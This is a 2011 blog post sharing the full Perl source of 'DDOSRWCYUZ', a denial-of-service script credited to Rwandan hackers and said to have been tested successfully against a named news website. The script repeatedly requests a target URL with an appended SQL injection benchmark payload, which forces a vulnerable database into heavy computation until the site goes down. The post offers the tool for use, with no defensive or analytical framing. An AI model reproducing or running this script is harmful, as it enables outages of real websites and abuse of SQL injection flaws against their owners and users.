Saturday, November 5, 2011

DDOS tool coded by Rwandan Hackers

this tool was coded by "cyuzuzo Rwandan Hacker".The tool has been programed in perl and php.
First it was tested on  www.inyarwanda.com, and as expected it get success
Source Code Of "DDOSRWCYUZ"



#!usr/bin/perl
#DDOSRWCYUZ (C) RWANDAN HACKERS
 
use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();
 
sub now {
print "\n[+] Urubuga rwa interineti : ".$_[0]."\n";
print "\n[+] Gutagiza attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}
 
sub adios {
print "\n[+] Guhagarika attack\n";
copyright();
}
 
sub head {
print "\n\n-- == DDOSRWCYUZ CODED BY Rwandan Hacker == --\n\n";
}
 
sub copyright {
print "\n\n-- ==DDOSRWCYUZ CODED BY Rwandan Hacker== --\n\n";
exit(1);
}
 
sub sintax {
print "\n[+] Sintax : $0 \n";
}
 
sub toma {
return $nave->get($_[0]);
}
 
# ¿ Rwandan hacker?

No comments:

Post a Comment